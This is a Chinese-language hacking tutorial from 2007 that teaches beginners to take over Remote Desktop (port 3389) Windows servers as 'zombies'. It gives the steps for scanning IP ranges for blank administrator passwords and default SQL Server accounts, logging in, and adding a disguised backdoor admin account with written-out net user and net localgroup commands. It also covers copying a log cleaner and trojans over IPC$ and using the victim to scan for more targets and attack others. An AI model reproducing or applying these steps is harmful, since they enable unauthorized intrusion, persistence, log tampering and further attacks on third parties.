建立你的3389肉鸡（菜鸟篇） -站长中国-中国站长门户从这里开始全面了解中国站长

建立你的3389肉鸡（菜鸟篇）

　 2007年10月15日03:58:56　评论(0条) 字体:[大中小]
相关热点：

现在有输入法漏洞的机器已不多了，除非你遇见的是一个极不负责任的网管，呵呵！~这篇教程就是教你不用输入法漏洞就能用终端服务连接上开3389的机器，使它成为你的肉鸡。（下面的人要注意啊，不要搞国内的机器，我用来做示范的是台湾的机器，为何要用台湾的呢？等一下就知道啦）先做一下准备活动，呵呵！何为准备活动？就是找到要用的工具呀。（操作系统要求win2000/NT)
一.X-scan-v1.0,强大的扫描工具，简单易用，没有IP限制，呵呵？想到什么了？
二.WIN2000终端服务客户端（没这个怎么叫3389肉鸡呢？）
三.CleanIISLog.exe,榕哥的清日志的好东东！^o^(又买广告呢）
四.SQLEXEC.EXE
（以上软件均在本站有下http://www.sandflee.net)
好！武器都准备好了就动手吧！
一。运行X-scan-v1.0工具包中的xscan_gui.exe，这是一个图形界面的扫描器，在“扫描设置”下选择“标准端口”；“NT弱口令用户”；“SQL-SERVER默认帐户”这三项，“运行参数”下填上你要扫描的IP地址段，例如：211.**.1.1-211.**.20.255（选的范围不要太大，要不很长时间都扫不完，也不要太少，少了可能找不到肉鸡），尽量不要选下面的“使用代理服务器”，线程要看你的网速如何，快的可以填50线程，我一般是用50的！YEAH！~~在“扫描前先PING主机”打上钩，“X-SCANNER所在位置”用默认的.\xscan.exe就可以了。再来“其他设置”下，“配置文件”处是.\dat\config.ini，点击旁边的“读取设置”，看到这个面板的框框都有东西了，就表示设置好！回到开始时的“扫描设置”面板下，点击下方的“开始扫描”。见到一个DOS窗口出来了，扫描正式开始！^O^,去泡泡MM吧，天南地北的吹一通，呵呵，看到扫描全部完成了，和你的MM说拜拜咯，开工~！！
看看扫描的报告，可能会很多的，一定要看清楚哦，要不肉鸡可能就这样给飞走啦。找找看，（主要是找有NT弱口令帐户又同时开了3389的机器）我就找到了一个例子：（不是真的哦，别照这个去试）

211.**.**.53: 【详细资料】【主机摘要 -- 域名/主机名:"快辣侥" 操作系统:"Windows NT 5.0"】

NT弱口令帐户:1 开放端口:135,139,3389
看到了吗？NT弱口令帐户:1 开放端口:135,139,3389，！！！！！！！！！！
好了，再点“详细资料”进去看看：
【NT弱口令用户】:

Administrator: [空口令]
帐户类型：管理员(Administrator)
最后登录时间: GMT
错误口令次数: 0次
成功登录次数: 9次
用户ID: 0x000001f4, 组ID: 0x00000201
欢呼吧，！！！！！！！（如果看到“详细资料”里的帐户类型不是管理员的话，就找下一个吧，反正扫描报告多得很，总会找到一个的，我就试过扫描一次，就扫到了十多个这样的帐户，呵呵！~~）
知道了管理员的帐户是：Administrator，口令是空！到这时候，这台NT主机已差不多可以说是你的啦。

二.运行你的终端服务客户端，填上这个IP，按“连接”，等一下就看到了熟悉的WIN2000终端登陆界面，好，填上用户名：Administrator，口令不用填啦，按“确定”，等一下，哈哈！！！！！进去啦~~~~你会先看到一个叫你设定伺服器的画面，关掉，不要了。想干什么？首先我们为了防止管理员以后改了密码，我们先要给自己做一个管理员的帐户，点对方屏幕的开始--》程序--》附件--》命令提示符（这里的字有时是不同的，要看具体是什么系统，自己好好看看吧），依次输入：
C:\>net user owem lgg1234 /add（加入一个用户名为owem,密码：lgg1314的帐户）
指令執行成功。
C：\>net localgroup administrators owem /add(把owem加入到管理员组）
指令執行成功。
好了！到这里你已增加了一个管理员了，以后就算他把Administrator的密码改了你也可以用owem这个帐户进去耍啦，建议你先用net user看看人家的管理组有多少人，人多的话就尽管加个号吧，人少的加号时就要找一个近似于对方的名字来迷惑管理员，哈哈~`够绝了吧！
再来，在自己的命令提示符下依次输入：
D:\hacker>net use \\211.**.**.53\ipc$ "lgg1314" /user:"owem"(用IPC管道连接上去）
命令成功完成。
D:\hacker>copy CleanIISLog.exe \\211.**.**.53\c$(把CleanIISLog.exe拷到对方对方C盘下，有时会拒绝访问的，就拷到其他目录下吧）
已复制 1 个文件。
你也可以把木马拷上去，哈哈！~~~有意思！！5555555555.....
再来删除IPC的连接
D:\hacker>net use \\211.**.**.53\ipc$ /delete
\\211.**.**.53\ipc$ 已经删除。
先去看看管理员在不在，开始--》程序--》系统管理工具--》终端服务管理员，哈哈！`~没在！爽极啦，只有你一个连线！
下面该玩点什么呢？打开他的浏览器，去你知道的黑软地址下载你想用的工具，什么？装个流光？哈哈！~~`目标太大了吧？还是下个X-SCAN算了，下个IP炸弹？？呵呵！好主意，`炸你的情敌去吧！用他下载的X-SCAN帮你去找更多的肉鸡！1YEAH！如果你在上面运行了程序，你退出时就只关终端窗口右上角的X就行了，关掉后你的程序还在运行呢！明天睡醒了来收你的战果吧！如果你要全部退出，就按开始--》关机--》登出****（你的帐户）。

还要补充的就是如果你扫到的是：SQL-SERVER默认帐户，没有NT管理员弱口令，但3389还是开了的话，就可以用SQLEXEC。EXE来连接上去，建立帐户也是用一样的命令，你也可以用3389登陆上去啦。

好！下课！！GOOD LOCK！